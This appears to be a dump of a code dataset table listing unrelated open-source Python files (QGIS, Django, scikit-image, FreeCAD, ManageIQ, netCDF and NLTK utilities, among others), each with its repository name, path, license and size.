code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
---|---|---|---|---|---|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
TopoDelProp
A QGIS plugin
TopoDelProp
-------------------
begin : 2011-12-19
copyright : (C) 2011 by J. Gaspar Mora Navarro
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
"""
Formulario para la selección del tipo de trabajo: definitivo o en edicion, y
el sistema de coordenadas src del trabajo.
@author: J. Gaspar Mora Navarro.
@organization: Universidad Politécnica de Valencia. Dep Ing Cart. Geod. y Fotogrametria
@contact: [email protected]
@version: 0.1
@summary: Formulario para la selección del tipo de trabajo: definitivo o en edicion, y
el sistema de coordenadas src del trabajo.
"""
from PyQt4 import QtCore, QtGui
import sys
from TopoDelProp.forms.frmSelEsquema import Ui_frmSelEsquema
"""
sys.path.append("C:\eclipse\plugins\org.python.pydev.debug_2.3.0.2011121518\pysrc")
from pydevd import *
"""
class ctrSelEsquema(QtGui.QDialog):
"""
Se utiliza para seleccionar el tipo de trabajo: definitivo o en edicion, y
el sistema de coordenadas src del trabajo.
"""
#constructor
def __init__(self, oUtiles,mostrarEsquema=True):
"""
Inicializa el cuadro de dialogo.
@type oUtiles: utils.Utiles
@param oUtiles: Objeto de la clase utiles
"""
#Ejecuta el constructor de la clase padre QDialog
QtGui.QDialog.__init__(self,oUtiles.iface.mainWindow())
# QtGui.QDialog.init(self,dlgPadre)
#Inicializa el formulario
self.ui=Ui_frmSelEsquema() #inicializa la variable local ui al di??logo
self.ui.setupUi(self)
self.oUtiles=oUtiles
self.mostrarEsquema=mostrarEsquema
self.__tipoTrabajo=None
self.__src=None
self.__esquema=None
self.rellenaListas()
if mostrarEsquema==False:
self.ui.lwSrc.setEnabled(False)
self.connect(self.ui.lwTipoTrabajo, QtCore.SIGNAL("itemClicked(QListWidgetItem*)"), self.lwTipoTrabajoClick)
self.connect(self.ui.lwSrc, QtCore.SIGNAL("itemClicked(QListWidgetItem*)"), self.lwSrcClick)
self.connect(self.ui.bttAceptar, QtCore.SIGNAL('clicked()'), self.bttAceptar)
def rellenaListas(self):
if self.oUtiles.oDicDominios!=None:
listaValores = self.oUtiles.oDicDominios.get("src_trabajo")
else:
#no los ha cargado. No es editor ni consultor
listaDic=self.oUtiles.oConsultasPg.recuperaDatosTablaByteaDic(nombreTabla="dom.src_trabajo", listaCampos=["src_trabajo"], condicionWhere=None,listaValoresCondWhere=None,bytea_output_to_escape=False)
if isinstance(listaDic,Exception):
QtGui.QMessageBox.information(self,"Error al cargar dom.src_trabajo",listaDic.message ,1)#self es la ventana pasdre que necesita qmessagebox
return
if len(listaDic)>0:#cada fila es un diccionario campo:valor
listaValores=[]
for dic in listaDic:
listaValores.append(dic.get("src_trabajo"))
else:
QtGui.QMessageBox.information(self,"Error al cargar dom.src_trabajo","No se ha cargado ningún valor" ,1)#self es la ventana pasdre que necesita qmessagebox
return
if listaValores==None:#el campo no tiene posibles valores
return
for valor in listaValores:
self.ui.lwSrc.addItem(valor)
self.ui.lwTipoTrabajo.addItem("Edicion")
self.ui.lwTipoTrabajo.addItem("Definitivo")
self.ui.lwTipoTrabajo.addItem("Historico")
def lwTipoTrabajoClick(self, elemClicado):
"""
Establece la propiedad tipoTrabajo
"""
self.__tipoTrabajo=elemClicado.text()
if self.__tipoTrabajo=="Historico":
mens=unicode("Opción todavía no programada. Elija otra.","utf-8")
QtGui.QMessageBox.information(self,"Lo sentimos",mens ,1)#self es la ventana pasdre que necesita qmessagebox
self.__tipoTrabajo=None
def lwSrcClick(self, elemClicado):
"""
Establece la propiedad src
"""
src=elemClicado.text()
self.__src=src
def getEsquema(self):
prefijo=self.getPrefijoTipoTrabajo()
if prefijo==None:
return None
self.__esquema=prefijo + "src" + self.__src
return self.__esquema
def getSrc(self):
return self.__src
def getTipoTrabajo(self):
if self.__tipoTrabajo==None or self.__tipoTrabajo=="Historico":
return None
return self.__tipoTrabajo
def getPrefijoTipoTrabajo(self):
if self.__tipoTrabajo==None:
return None
if self.__tipoTrabajo=="Edicion":
prefijo="ed_"
elif self.__tipoTrabajo=="Definitivo":
prefijo=""
else:
prefijo="hist_"
return prefijo
def bttAceptar(self):
self.close()
def closeEvent(self, event):
"""
Evento que permite abrir una
ventana de dialogo para confirmar la salida del programa
"""
#Se genera la respuesta de la confirmacion de salir
if self.__tipoTrabajo==None:
mens=unicode("No ha seleccionado el tipo de trabajo. ¿Seguro que desea salir?","utf-8")
reply = QtGui.QMessageBox.question(self, "Mensaje", mens, QtGui.QMessageBox.Yes, QtGui.QMessageBox.No)
if reply == QtGui.QMessageBox.Yes:
#event.accept()
self.close()
else:
event.ignore()
elif self.mostrarEsquema==True:
if self.__src==None:
mens=unicode("No ha seleccionado el SRC del trabajo. ¿Seguro que desea salir?","utf-8")
reply = QtGui.QMessageBox.question(self, "Mensaje", mens, QtGui.QMessageBox.Yes, QtGui.QMessageBox.No)
if reply == QtGui.QMessageBox.Yes:
#event.accept()
self.close()
else:
event.ignore()
| gasparmoranavarro/TopoDelProp | ctr/ctrSelEsquema.py | Python | gpl-2.0 | 7,104 |
# -*- coding: utf-8 -*-
from Plugins.Extensions.MediaPortal.plugin import _
from Plugins.Extensions.MediaPortal.resources.imports import *
def promptfile(self, data, url):
if re.search('http://www.promptfile.com/file', data):
self.promptfilePost(data)
else:
chash = re.findall('type="hidden".*?"chash".*?name\s*=\s*"(.*?)"\s+value="(.*?)"', data, re.S)
if chash:
calcit = re.search('onclick=\'(.*?);', data, re.S)
if calcit:
calcData = calcit.group(1).replace('$("#chash").val()', chash[0][1]).replace('$("#chash")', chash[0][0]).replace('"','')
calcData = re.sub(r'val\((.*?)\)', r'\1' , calcData).split('.')
if len(calcData) == 2:
cval = calcData[1]
while '+' in cval:
cval = re.sub(r'(\w+)\+(\w+)', r'\1\2' , cval)
dataPost = {calcData[0]: cval}
twAgentGetPage(url, method='POST', postdata=urlencode(dataPost), agent=std_headers['User-Agent'], headers={'Accept':'*/*', 'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.promptfilePost).addErrback(self.errorload)
return
self.stream_not_found()
def promptfilePost(self, data):
stream_url = re.findall('src:\s*"(.*?)"', data, re.S)
if stream_url:
self._callback(stream_url[0])
else:
self.stream_not_found() | schleichdi2/OpenNfr_E2_Gui-6.0 | lib/python/Plugins/Extensions/MediaPortal/resources/hosters/promptfile.py | Python | gpl-2.0 | 1,248 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-11 13:07
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Image',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('image', models.ImageField(upload_to='images')),
('old_size', models.IntegerField()),
('new_size', models.IntegerField()),
],
),
]
| hehaichi/django-imagemanagement | imagemanagement/migrations/0001_initial.py | Python | mit | 721 |
import os
path = os.path.dirname(os.path.realpath(__file__))
sbmlFilePath = os.path.join(path, 'MODEL1006230011.xml')
with open(sbmlFilePath,'r') as f:
sbmlString = f.read()
def module_exists(module_name):
try:
__import__(module_name)
except ImportError:
return False
else:
return True
if module_exists('libsbml'):
import libsbml
sbml = libsbml.readSBMLFromString(sbmlString) | biomodels/MODEL1006230011 | MODEL1006230011/model.py | Python | cc0-1.0 | 427 |
from django import forms
from books.models import Book
class NewBookForm(forms.ModelForm):
class Meta:
model = Book
exclude = ('deleted', 'content_type',
'object_id', 'tribes', 'created')
| dongguangming/django-books | forms.py | Python | bsd-3-clause | 230 |
"""
==============
Edge operators
==============
Edge operators are used in image processing within edge detection algorithms.
They are discrete differentiation operators, computing an approximation of the
gradient of the image intensity function.
"""
import numpy as np
import matplotlib.pyplot as plt
from skimage.data import camera
from skimage.filters import roberts, sobel, scharr, prewitt
image = camera()
edge_roberts = roberts(image)
edge_sobel = sobel(image)
fig, (ax0, ax1) = plt.subplots(ncols=2, sharex=True, sharey=True, subplot_kw={'adjustable':'box-forced'})
ax0.imshow(edge_roberts, cmap=plt.cm.gray)
ax0.set_title('Roberts Edge Detection')
ax0.axis('off')
ax1.imshow(edge_sobel, cmap=plt.cm.gray)
ax1.set_title('Sobel Edge Detection')
ax1.axis('off')
plt.tight_layout()
"""
.. image:: PLOT2RST.current_figure
Different operators compute different finite-difference approximations of the
gradient. For example, the Scharr filter results in a less rotational variance
than the Sobel filter that is in turn better than the Prewitt filter [1]_ [2]_
[3]_. The difference between the Prewitt and Sobel filters and the Scharr filter
is illustrated below with an image that is the discretization of a rotation-
invariant continuous function. The discrepancy between the Prewitt and Sobel
filters, and the Scharr filter is stronger for regions of the image where the
direction of the gradient is close to diagonal, and for regions with high
spatial frequencies. For the example image the differences between the filter
results are very small and the filter results are visually almost
indistinguishable.
.. [1] https://en.wikipedia.org/wiki/Sobel_operator#Alternative_operators
.. [2] B. Jaehne, H. Scharr, and S. Koerkel. Principles of filter design. In
Handbook of Computer Vision and Applications. Academic Press, 1999.
.. [3] https://en.wikipedia.org/wiki/Prewitt_operator
"""
x, y = np.ogrid[:100, :100]
# Rotation-invariant image with different spatial frequencies
img = np.exp(1j * np.hypot(x, y)**1.3 / 20.).real
edge_sobel = sobel(img)
edge_scharr = scharr(img)
edge_prewitt = prewitt(img)
diff_scharr_prewitt = edge_scharr - edge_prewitt
diff_scharr_sobel = edge_scharr - edge_sobel
max_diff = np.max(np.maximum(diff_scharr_prewitt, diff_scharr_sobel))
fig, ((ax0, ax1), (ax2, ax3)) = plt.subplots(nrows=2, ncols=2, sharex=True, sharey=True, subplot_kw={'adjustable':'box-forced'})
ax0.imshow(img, cmap=plt.cm.gray)
ax0.set_title('Original image')
ax0.axis('off')
ax1.imshow(edge_scharr, cmap=plt.cm.gray)
ax1.set_title('Scharr Edge Detection')
ax1.axis('off')
ax2.imshow(diff_scharr_prewitt, cmap=plt.cm.gray, vmax=max_diff)
ax2.set_title('Scharr - Prewitt')
ax2.axis('off')
ax3.imshow(diff_scharr_sobel, cmap=plt.cm.gray, vmax=max_diff)
ax3.set_title('Scharr - Sobel')
ax3.axis('off')
plt.tight_layout()
plt.show()
"""
.. image:: PLOT2RST.current_figure
"""
| pratapvardhan/scikit-image | doc/examples/edges/plot_edge_filter.py | Python | bsd-3-clause | 2,909 |
# -*- coding: iso-8859-1 -*-
"""
MoinMoin - migration from base rev 1060300
Nothing to do, we just return the new data dir revision.
@copyright: 2008 by Thomas Waldmann
@license: GNU GPL, see COPYING for details.
"""
def execute(script, data_dir, rev):
return 1060400
| RealTimeWeb/wikisite | MoinMoin/script/migration/1060300.py | Python | apache-2.0 | 292 |
#!/usr/bin/env python3
"""SSH into a running appliance and configure security.
Configures security on appliance(s) according to this document:
https://access.redhat.com/articles/1124753
Works for single appliance and distributed appliance configurations.
In distributed configurations, provide the hostname of the replication
parent first, and then provide the hostnames of any child appliances using
the '-c' flag.
Example usage:
Configure security for a single appliance:
configure_security.py 10.0.0.1
Configure security for distributed appliance set:
# replication parent: 10.0.0.1
# replication child: 10.0.0.2
# replication child: 10.0.0.3
configure_security.py 10.0.0.1 -c 10.0.0.2 -c 10.0.0.3
"""
import argparse
import re
import socket
import sys
import fauxfactory
from cfme.utils.conf import credentials
from cfme.utils.ssh import SSHClient
from cfme.utils.wait import wait_for
def main():
parser = argparse.ArgumentParser(epilog=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('appliance',
help='hostname or ip address of parent appliance')
parser.add_argument('-c', action='append', dest='children',
help='hostname or ip address of child appliance')
args = parser.parse_args()
print(f"Appliance: {args.appliance}")
if args.children:
for child in args.children:
print(f"Child: {child}")
local_key_name = "v2_key_" + fauxfactory.gen_alphanumeric(8)
ssh_creds = {
'username': credentials['ssh']['username'],
'password': credentials['ssh']['password'],
}
def is_ssh_running(address):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
return s.connect_ex((address, 22)) == 0
def generate_key(address):
with SSHClient(hostname=address, **ssh_creds) as client:
print('Connecting to Appliance...')
result = client.run_command(
'ruby /var/www/miq/vmdb/tools/fix_auth.rb --key --verbose')
if result.failed:
print('Creating new encryption key failed.')
print(result.output)
sys.exit(1)
else:
print('New encryption key created.')
if args.children:
# Only copy locally if needed for child appliances
client.get_file('/var/www/miq/vmdb/certs/v2_key',
local_key_name)
def update_db_yaml(address):
with SSHClient(hostname=address, **ssh_creds) as client:
client.run_command('cd /var/www/miq/vmdb')
# TODO Issue 8595, MiqPassword alias/gem will go away
# IPAppliance.password_gem property version picks the gem name
# We only have an address here, will have to look for the gem.
result = client.run_rails_command(
'\'puts MiqPassword.encrypt("smartvm");\'')
if result.failed:
print(f'Retrieving encrypted db password failed on {address}')
sys.exit(1)
else:
encrypted_pass = result.output
result = client.run_command(
'cd /var/www/miq/vmdb; '
'sed -i.`date +%m-%d-%Y` "s/password:'
rf' .*/password: {re.escape(encrypted_pass)}/g" config/database.yml')
if result.failed:
print(f'Updating database.yml failed on {address}')
print(result.output)
sys.exit(1)
else:
print(f'Updating database.yml succeeded on {address}')
def update_password(address):
with SSHClient(hostname=address, **ssh_creds) as client:
result = client.run_command(
'ruby /var/www/miq/vmdb/tools/fix_auth.rb --hostname localhost --password smartvm')
if result.failed:
print(f'Updating DB password failed on {address}')
print(result.output)
sys.exit(1)
else:
print(f'DB password updated on {address}')
def put_key(address):
print(f'copying key to {address}')
with SSHClient(hostname=address, **ssh_creds) as client:
client.put_file(local_key_name, '/var/www/miq/vmdb/certs/v2_key')
def restart_appliance(address):
print(f'Restarting evmserverd on {address}')
with SSHClient(hostname=address, **ssh_creds) as client:
result = client.run_command('systemctl restart evmserverd')
if result.failed:
print(f"Restarting evmserverd failed on {address}")
sys.exit(1)
else:
print(f"Restarting succeeded on {address}")
# make sure ssh is ready on each appliance
wait_for(func=is_ssh_running, func_args=[args.appliance], delay=10, num_sec=600)
# generate key on master appliance
generate_key(args.appliance)
update_db_yaml(args.appliance)
# copy to other appliances
if args.children:
for child in args.children:
wait_for(func=is_ssh_running, func_args=[child], delay=10, num_sec=600)
put_key(child)
update_db_yaml(child)
# restart master appliance (and children, if provided)
restart_appliance(args.appliance)
if args.children:
for child in args.children:
restart_appliance(child)
print("Appliance(s) restarted with new key in place.")
# update encrypted passwords in each database-owning appliance.
update_password(args.appliance)
if args.children:
for child in args.children:
update_password(child)
# Restart again!
restart_appliance(args.appliance)
if args.children:
for child in args.children:
restart_appliance(child)
print("Done!")
if __name__ == '__main__':
sys.exit(main())
| ManageIQ/integration_tests | scripts/harden_security.py | Python | gpl-2.0 | 5,968 |
from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="EQTransformer",
author="S. Mostafa Mousavi",
version="0.1.61",
author_email="[email protected]",
description="A python package for making and using attentive deep-learning models for earthquake signal detection and phase picking.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/smousavi05/EQTransformer",
license="MIT",
packages=find_packages(),
keywords='Seismology, Earthquakes Detection, P&S Picking, Deep Learning, Attention Mechanism',
install_requires=[
'pytest',
'numpy~=1.19.2', # appox version: numpy 1.19.x but at least 1.19.2
'keyring>=15.1',
'pkginfo>=1.4.2',
'scipy>=1.4.1',
'tensorflow~=2.5.0', # tensorflow <2.7.0 needs numpy <1.20.0
'keras==2.3.1',
'matplotlib',
'pandas',
'tqdm>=4.48.0',
'h5py~=3.1.0',
'obspy',
'jupyter'],
python_requires='>=3.6',
)
| smousavi05/EQTransformer | setup.py | Python | mit | 1,037 |
'''OpenGL extension EXT.texture_env_combine
This module customises the behaviour of the
OpenGL.raw.GL.EXT.texture_env_combine to provide a more
Python-friendly API
Overview (from the spec)
New texture environment function COMBINE_EXT allows programmable
texture combiner operations, including:
REPLACE Arg0
MODULATE Arg0 * Arg1
ADD Arg0 + Arg1
ADD_SIGNED_EXT Arg0 + Arg1 - 0.5
INTERPOLATE_EXT Arg0 * (Arg2) + Arg1 * (1-Arg2)
where Arg0, Arg1 and Arg2 are derived from
PRIMARY_COLOR_EXT primary color of incoming fragment
TEXTURE texture color of corresponding texture unit
CONSTANT_EXT texture environment constant color
PREVIOUS_EXT result of previous texture environment; on
texture unit 0, this maps to PRIMARY_COLOR_EXT
and Arg2 is restricted to the alpha component of the corresponding source.
In addition, the result may be scaled by 1.0, 2.0 or 4.0.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/EXT/texture_env_combine.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.EXT.texture_env_combine import *
from OpenGL.raw.GL.EXT.texture_env_combine import _EXTENSION_NAME
def glInitTextureEnvCombineEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION | stack-of-tasks/rbdlpy | tutorial/lib/python2.7/site-packages/OpenGL/GL/EXT/texture_env_combine.py | Python | lgpl-3.0 | 1,682 |
"""Imports for Python API.
This file is MACHINE GENERATED! Do not edit.
Generated by: tensorflow/tools/api/generator/create_python_api.py script.
"""
from tensorflow.python import constant_initializer as constant
from tensorflow.python import global_variables_initializer as global_variables
from tensorflow.python import local_variables_initializer as local_variables
from tensorflow.python import ones_initializer as ones
from tensorflow.python import orthogonal_initializer as orthogonal
from tensorflow.python import random_normal_initializer as random_normal
from tensorflow.python import random_uniform_initializer as random_uniform
from tensorflow.python import truncated_normal_initializer as truncated_normal
from tensorflow.python import uniform_unit_scaling_initializer as uniform_unit_scaling
from tensorflow.python import variables_initializer as variables
from tensorflow.python import variance_scaling_initializer as variance_scaling
from tensorflow.python import zeros_initializer as zeros
from tensorflow.python.keras._impl.keras.initializers import Identity as identity | ryfeus/lambda-packs | Keras_tensorflow_nightly/source2.7/tensorflow/tools/api/generator/api/initializers/__init__.py | Python | mit | 1,088 |
# ***************************************************************************
# * Copyright (c) 2009, 2010 Yorik van Havre <[email protected]> *
# * Copyright (c) 2009, 2010 Ken Cline <[email protected]> *
# * Copyright (c) 2020 Eliud Cabrera Castillo <[email protected]> *
# * *
# * This file is part of the FreeCAD CAx development system. *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * FreeCAD is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with FreeCAD; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
"""Provides functions to create Text objects."""
## @package make_text
# \ingroup draftmake
# \brief Provides functions to create Text objects.
## \addtogroup draftmake
# @{
import FreeCAD as App
import draftutils.utils as utils
import draftutils.gui_utils as gui_utils
from draftutils.messages import _msg, _err
from draftutils.translate import translate
from draftobjects.text import Text
if App.GuiUp:
from draftviewproviders.view_text import ViewProviderText
def make_text(string, placement=None, screen=False):
"""Create a Text object containing the given list of strings.
The current color and text height and font specified in preferences
are used.
Parameters
----------
string: str, or list of str
String to display on screen.
If it is a list, each element in the list represents a new text line.
placement: Base::Placement, Base::Vector3, or Base::Rotation, optional
It defaults to `None`.
If it is provided, it is the placement of the new text.
The input could be a full placement, just a vector indicating
the translation, or just a rotation.
screen: bool, optional
It defaults to `False`, in which case the text is placed in 3D space
oriented like any other object, on top of a given plane,
by the default the XY plane.
If it is `True`, the text will always face perpendicularly
to the camera direction, that is, it will be flat on the screen.
Returns
-------
App::FeaturePython
A scripted object of type `'Text'`.
This object does not have a `Shape` attribute, as the text is created
on screen by Coin (pivy).
None
If there is a problem it will return `None`.
"""
_name = "make_text"
utils.print_header(_name, "Text")
found, doc = utils.find_doc(App.activeDocument())
if not found:
_err(translate("draft","No active document. Aborting."))
return None
_msg("string: {}".format(string))
try:
utils.type_check([(string, (str, list))], name=_name)
except TypeError:
_err(translate("draft","Wrong input: must be a list of strings or a single string."))
return None
if (type(string) is list
and not all(isinstance(element, str) for element in string)):
_err(translate("draft","Wrong input: must be a list of strings or a single string."))
return None
_msg("placement: {}".format(placement))
if not placement:
placement = App.Placement()
try:
utils.type_check([(placement, (App.Placement,
App.Vector,
App.Rotation))], name=_name)
except TypeError:
_err(translate("draft","Wrong input: must be a placement, a vector, or a rotation."))
return None
# Convert the vector or rotation to a full placement
if isinstance(placement, App.Vector):
placement = App.Placement(placement, App.Rotation())
elif isinstance(placement, App.Rotation):
placement = App.Placement(App.Vector(), placement)
new_obj = doc.addObject("App::FeaturePython",
"Text")
Text(new_obj)
new_obj.Text = string
new_obj.Placement = placement
if App.GuiUp:
ViewProviderText(new_obj.ViewObject)
h = utils.get_param("textheight", 2)
new_obj.ViewObject.DisplayMode = "3D text"
if screen:
_msg("screen: {}".format(screen))
new_obj.ViewObject.DisplayMode = "2D text"
h = h * 10
new_obj.ViewObject.FontSize = h
new_obj.ViewObject.FontName = utils.get_param("textfont", "")
new_obj.ViewObject.LineSpacing = 1
gui_utils.format_object(new_obj)
gui_utils.select(new_obj)
return new_obj
def makeText(stringlist, point=App.Vector(0, 0, 0), screen=False):
"""Create Text. DEPRECATED. Use 'make_text'."""
utils.use_instead("make_text")
return make_text(stringlist, point, screen)
def convert_draft_texts(textslist=None):
"""Convert the given Annotation to a Draft text.
In the past, the `Draft Text` object didn't exist; text objects
were of type `App::Annotation`. This function was introduced
to convert those older objects to a `Draft Text` scripted object.
This function was already present at splitting time during v0.19.
Parameters
----------
textslist: list of objects, optional
It defaults to `None`.
A list containing `App::Annotation` objects or a single of these
objects.
If it is `None` it will convert all objects in the current document.
"""
_name = "convert_draft_texts"
utils.print_header(_name, "Convert Draft texts")
found, doc = utils.find_doc(App.activeDocument())
if not found:
_err(translate("draft","No active document. Aborting."))
return None
if not textslist:
textslist = list()
for obj in doc.Objects:
if obj.TypeId == "App::Annotation":
textslist.append(obj)
if not isinstance(textslist, list):
textslist = [textslist]
to_delete = []
for obj in textslist:
label = obj.Label
obj.Label = label + ".old"
# Create a new Draft Text object
new_obj = make_text(obj.LabelText, placement=obj.Position)
new_obj.Label = label
to_delete.append(obj)
# Move the new object to the group which contained the old object
for in_obj in obj.InList:
if in_obj.isDerivedFrom("App::DocumentObjectGroup"):
if obj in in_obj.Group:
group = in_obj.Group
group.append(new_obj)
in_obj.Group = group
for obj in to_delete:
doc.removeObject(obj.Name)
def convertDraftTexts(textslist=[]):
"""Convert Text. DEPRECATED. Use 'convert_draft_texts'."""
utils.use_instead("convert_draft_texts")
return convert_draft_texts(textslist)
## @}
| sanguinariojoe/FreeCAD | src/Mod/Draft/draftmake/make_text.py | Python | lgpl-2.1 | 7,940 |
import logging
from flask import Flask
from honeybadger.contrib import FlaskHoneybadger
from blueprint import simple_page
logger = logging.getLogger(__name__)
app = Flask(__name__)
app.config['HONEYBADGER_ENVIRONMENT'] = 'honeybadger-example'
app.config['HONEYBADGER_API_KEY'] = '<your key>'
app.config['HONEYBADGER_PARAMS_FILTERS'] = 'password, secret, credit-card'
FlaskHoneybadger(app, report_exceptions=True)
app.register_blueprint(simple_page)
| honeybadger-io/honeybadger-python | examples/flask-blueprint/app.py | Python | mit | 454 |
'''
Doc...
@author: kmu
@since: 16. nov. 2010
'''
# Built-in
import time
import datetime
# Additional
from numpy import arange
from netCDF4 import Dataset, num2date, date2num
# Own
from pysenorge.tools.date_converters import iso2datetime
from pysenorge.set_environment import timeunit, default_UM4_width,\
default_UM4_height
def cloneUM4(masterfile, newfile, startdate='copy', tn=24, dt=3600.0):
"""
Creates a new UM4 netCDF file based on a master file.
Convention: Climate and Forecast (CF) version 1.4
@param secs: in seconds since 1970-01-01 00:00:00
"""
print "Started cloning %s as %s" % (masterfile, newfile)
# open master file
master = Dataset(masterfile, 'r')
Mdimensions = master.dimensions.keys()
# create new file
rootgrp = Dataset(newfile, 'w', format='NETCDF3_CLASSIC')
# add root dimensions
rootgrp.createDimension('time', size=tn)
rootgrp.createDimension('rlon', size=default_UM4_width)
rootgrp.createDimension('rlat', size=default_UM4_height)
rootgrp.createDimension('sigma', size=1)
# add root attributes
rootgrp.Conventions = "CF-1.4"
rootgrp.institution = "Norwegian Water Resources and Energy Directorate (NVE)"
rootgrp.source = "Compiled from several +66 hour prognoses by the Norwegian Meteorological Institute (met.no)"
rootgrp.history = "%s created" % time.ctime(time.time())
rootgrp.references = "met.no"
rootgrp.comment = "Progonosis data for www.senorge.no"
# add time variable
Mtime = master.variables['time']
# determine start date
try:
_end = date2num(iso2datetime(startdate), timeunit)
_start = _end - ((tn-1) * dt)
except ValueError:
# if the startdate is set to "copy" use the date of the last input file
Mdate = num2date(Mtime[0], timeunit).date()
utc6 = datetime.time(06, 00, 00)
_end = date2num(datetime.datetime.combine(Mdate, utc6), timeunit)
_start = _end - ((tn-1) * dt)
print (_end-_start)/dt
_time = rootgrp.createVariable('time', 'f8', ('time',))
_time[:] = arange(_start, _end+dt, dt) # ensures that _end is included
for attr in Mtime.ncattrs():
_time.setncattr(attr, Mtime.getncattr(attr))
# add rlon variable
Mrlon = master.variables['rlon']
_rlon = rootgrp.createVariable('rlon', 'f4', ('rlon',))
_rlon[:] = Mrlon[:]
for attr in Mrlon.ncattrs():
_rlon.setncattr(attr, Mrlon.getncattr(attr))
# add rlat variable
Mrlat = master.variables['rlat']
_rlat = rootgrp.createVariable('rlat', 'f4', ('rlat',))
_rlat[:] = Mrlat[:]
for attr in Mrlat.ncattrs():
_rlat.setncattr(attr, Mrlat.getncattr(attr))
# add sigma variable
try:
Msigma = master.variables['sigma']
_sigma = rootgrp.createVariable('sigma', 'i2', ('sigma',))
_sigma[:] = Msigma[:]
for attr in Msigma.ncattrs():
_sigma.setncattr(attr, Msigma.getncattr(attr))
except KeyError:
print "No variable called 'sigma'!"
for var in master.variables.keys():
# exclude the variables referring to dimensions
if var not in Mdimensions:
exec("M%s = master.variables['%s']" % (var, var))
exec("print 'Cloning %s', master.variables['%s'].dimensions" % (var, var))
exec("_%s = rootgrp.createVariable('%s', M%s.dtype, M%s.dimensions)" % (var, var, var, var))
exec("""for attr in M%s.ncattrs():\n\t_%s.setncattr(attr, M%s.getncattr(attr))""" % (var, var, var))
rootgrp.close()
master.close()
print "Cloning completed!"
if __name__ == '__main__':
pass | kmunve/pysenorge | pysenorge/tools/clone_netCDF.py | Python | gpl-3.0 | 3,835 |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
""" Converts text files into randomized sequences which
cannot be translated without the seed value. """
import cPickle as pkl
import numpy as np
import os
import nltk
import nltk.data
import codecs
import sys
""" take in raw text, converts each sentence to list of lowercase
words and returns list of sentence word lists."""
def clean_text (raw_text, detector) :
# nltk's sophisticated method for detecting sentence boundaries
sentences = detector.tokenize(raw_text.strip())
pattern = r'''(?x)
(([a-zA-Z]|ph)\.)+(\b[a-zA-Z]\b)? # accronyms/abbreviations
| \d+(\.\d+) # decimal numbers
| \w+([-']\w+)* # words/numbers incl. hyphenated
| \.\.\. # ellipsis
| [][.,;"'?():-_`] ''' # punctuation
# convert each sentence to a list of lowercase tokens
sentence_list = [nltk.regexp_tokenize(sentence.lower(),pattern)
for sentence in sentences]
return sentence_list
""" Takes in a dictionary text file and maps each word to a number
based on frequency. Returns this dictionary of mappings. """
def load_dictionary(file_path, max_index) :
words = {}
with codecs.open(file_path, 'r', 'utf-8') as f :
count = max_index
for line in f :
l = line.split(' ')
words[l[0]] = count
count -= 1
return words
""" takes a text file and encodes it as a reproducibly random
numerical sequence. The sequence cannot be converted back to
a word sequence without the seed value. """
def parse_file (file_path, word_dict, detector, seed) :
# read in file and get rid of markup
with codecs.open(file_path, 'r', 'utf-8') as f :
cleaned_sentences = clean_text(f.read(), detector)
# randomize dictionary according to seed
np.random.seed(seed)
rand_dict = dict(
zip(word_dict.keys(), np.random.permutation(word_dict.values())))
# convert each sentence to a sequence
sequence_list = [[rand_dict[word] for word in sentence if word in rand_dict]
for sentence in cleaned_sentences]
return sequence_list
""" actual script to be run """
# load these parameters once then pass into parse function
google_100k = load_dictionary('/fs3/group/chlgrp/datasets/Google-1grams/Google-1grams-top100k.txt', 100000)
seed = np.random.randint(0, 4294967295)
sentence_detector = nltk.data.load('tokenizers/punkt/english.pickle')
# call parse_file(file_path, google_100k, sentence_detector, seed) for
# each file in t
app = parse_file('/fs3/home/enagaraj/project/test_files/768.statement_of_purpose.Eela_Nagaraj.txt', google_100k, sentence_detector, seed)
"""
rand = randomize_dict(words, test_seed)
num_conversion = {}
for word in rand :
num_conversion[rand[word]] = words[word]
app = parse_file('/fs3/home/enagaraj/project/test_files/768.statement_of_purpose.Eela_Nagaraj.txt', words, sentence_detector, test_seed)
short_app = parse_file('/fs3/home/enagaraj/project/test_files/short_statement.txt', words, sentence_detector, test_seed)
"""
| eelanagaraj/IST_project | text_processing/text_preprocessing.py | Python | mit | 2,943 |
"""
Copyright (C) 2011 Jon Macey
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
